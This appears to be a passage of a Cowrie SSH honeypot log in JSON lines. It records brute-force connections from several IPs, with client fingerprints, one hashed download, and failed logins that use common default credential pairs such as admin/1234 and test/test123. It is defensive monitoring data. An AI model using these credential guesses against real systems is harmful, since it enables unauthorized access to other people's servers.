{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T11:58:54.818127Z","src_ip":"212.227.235.229","session":"a4edbfb17249"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:58:54.818909Z","src_ip":"212.227.235.229","session":"a4edbfb17249"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:58:54.819679Z","src_ip":"212.227.235.229","session":"a4edbfb17249"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58496,"dst_ip":"1.2.3.4","dst_port":22,"session":"223eb8719427","protocol":"ssh","message":"New connection: 212.227.125.160:58496 (1.2.3.4:22) [session: 223eb8719427]","sensor":"my-vps","timestamp":"2025-08-26T11:58:56.790998Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:58:56.791866Z","src_ip":"212.227.125.160","session":"223eb8719427"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:58:56.851109Z","src_ip":"212.227.125.160","session":"223eb8719427"}
{"eventid":"cowrie.login.failed","username":"debian-spamd","password":"debian-spamd","message":"login attempt [debian-spamd/debian-spamd] failed","sensor":"my-vps","timestamp":"2025-08-26T11:58:57.064634Z","src_ip":"212.227.125.160","session":"223eb8719427"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":38040,"dst_ip":"1.2.3.4","dst_port":22,"session":"2185fe24a904","protocol":"ssh","message":"New connection: 196.251.86.249:38040 (1.2.3.4:22) [session: 2185fe24a904]","sensor":"my-vps","timestamp":"2025-08-26T11:58:57.508077Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:58:58.130785Z","src_ip":"196.251.86.249","session":"2185fe24a904"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:58:58.132247Z","src_ip":"196.251.86.249","session":"2185fe24a904"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:58:58.196059Z","src_ip":"212.227.125.160","session":"223eb8719427"}
{"eventid":"cowrie.login.failed","username":"git","password":"pass123","message":"login attempt [git/pass123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:59:00.986784Z","src_ip":"196.251.86.249","session":"2185fe24a904"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:59:02.418184Z","src_ip":"196.251.86.249","session":"2185fe24a904"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59262,"dst_ip":"1.2.3.4","dst_port":22,"session":"c21eb1ca43c6","protocol":"ssh","message":"New connection: 212.227.125.160:59262 (1.2.3.4:22) [session: c21eb1ca43c6]","sensor":"my-vps","timestamp":"2025-08-26T11:59:04.136546Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:59:04.229961Z","src_ip":"212.227.125.160","session":"c21eb1ca43c6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:59:04.230630Z","src_ip":"212.227.125.160","session":"c21eb1ca43c6"}
{"eventid":"cowrie.login.failed","username":"test","password":"test123","message":"login attempt [test/test123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:59:06.384345Z","src_ip":"212.227.125.160","session":"c21eb1ca43c6"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:59:07.527874Z","src_ip":"212.227.125.160","session":"c21eb1ca43c6"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":46604,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f0bd9ea7d12","protocol":"ssh","message":"New connection: 83.168.105.65:46604 (1.2.3.4:22) [session: 3f0bd9ea7d12]","sensor":"my-vps","timestamp":"2025-08-26T11:59:08.560535Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:59:08.561500Z","src_ip":"83.168.105.65","session":"3f0bd9ea7d12"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:59:08.600936Z","src_ip":"83.168.105.65","session":"3f0bd9ea7d12"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T11:59:08.720885Z","src_ip":"83.168.105.65","session":"3f0bd9ea7d12"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:59:09.763244Z","src_ip":"83.168.105.65","session":"3f0bd9ea7d12"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60034,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a4a5a66d941","protocol":"ssh","message":"New connection: 212.227.125.160:60034 (1.2.3.4:22) [session: 9a4a5a66d941]","sensor":"my-vps","timestamp":"2025-08-26T11:59:10.768730Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:59:10.770491Z","src_ip":"212.227.125.160","session":"9a4a5a66d941"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:59:10.821872Z","src_ip":"212.227.125.160","session":"9a4a5a66d941"}
{"eventid":"cowrie.login.failed","username":"yarn","password":"yarn","message":"login attempt [yarn/yarn] failed","sensor":"my-vps","timestamp":"2025-08-26T11:59:11.042980Z","src_ip":"212.227.125.160","session":"9a4a5a66d941"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:59:12.094782Z","src_ip":"212.227.125.160","session":"9a4a5a66d941"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60804,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb19d4b97e96","protocol":"ssh","message":"New connection: 212.227.125.160:60804 (1.2.3.4:22) [session: bb19d4b97e96]","sensor":"my-vps","timestamp":"2025-08-26T11:59:17.628424Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:59:17.630146Z","src_ip":"212.227.125.160","session":"bb19d4b97e96"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:59:17.973978Z","src_ip":"212.227.125.160","session":"bb19d4b97e96"}
{"eventid":"cowrie.login.failed","username":"test","password":"1234qwer","message":"login attempt [test/1234qwer] failed","sensor":"my-vps","timestamp":"2025-08-26T11:59:18.847081Z","src_ip":"212.227.125.160","session":"bb19d4b97e96"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:59:19.899256Z","src_ip":"212.227.125.160","session":"bb19d4b97e96"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33342,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ae0bd5ce670","protocol":"ssh","message":"New connection: 212.227.125.160:33342 (1.2.3.4:22) [session: 2ae0bd5ce670]","sensor":"my-vps","timestamp":"2025-08-26T11:59:22.416936Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:59:22.417777Z","src_ip":"212.227.125.160","session":"2ae0bd5ce670"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:59:22.572208Z","src_ip":"212.227.125.160","session":"2ae0bd5ce670"}
{"eventid":"cowrie.login.failed","username":"backuply","password":"backuply","message":"login attempt [backuply/backuply] failed","sensor":"my-vps","timestamp":"2025-08-26T11:59:23.105938Z","src_ip":"212.227.125.160","session":"2ae0bd5ce670"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":52084,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1407264d6d5","protocol":"ssh","message":"New connection: 83.168.105.65:52084 (1.2.3.4:22) [session: f1407264d6d5]","sensor":"my-vps","timestamp":"2025-08-26T11:59:24.042933Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:59:24.044302Z","src_ip":"83.168.105.65","session":"f1407264d6d5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:59:24.084710Z","src_ip":"83.168.105.65","session":"f1407264d6d5"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:59:24.156680Z","src_ip":"212.227.125.160","session":"2ae0bd5ce670"}
{"eventid":"cowrie.login.failed","username":"www","password":"www","message":"login attempt [www/www] failed","sensor":"my-vps","timestamp":"2025-08-26T11:59:24.207204Z","src_ip":"83.168.105.65","session":"f1407264d6d5"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:59:25.250897Z","src_ip":"83.168.105.65","session":"f1407264d6d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55366,"dst_ip":"1.2.3.4","dst_port":22,"session":"b34b1016585a","protocol":"ssh","message":"New connection: 212.227.235.229:55366 (1.2.3.4:22) [session: b34b1016585a]","sensor":"my-vps","timestamp":"2025-08-26T11:59:28.006079Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:59:28.367163Z","src_ip":"212.227.235.229","session":"b34b1016585a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:59:28.367778Z","src_ip":"212.227.235.229","session":"b34b1016585a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34112,"dst_ip":"1.2.3.4","dst_port":22,"session":"79bb2f9f1b8c","protocol":"ssh","message":"New connection: 212.227.125.160:34112 (1.2.3.4:22) [session: 79bb2f9f1b8c]","sensor":"my-vps","timestamp":"2025-08-26T11:59:29.658898Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:59:29.663160Z","src_ip":"212.227.125.160","session":"79bb2f9f1b8c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp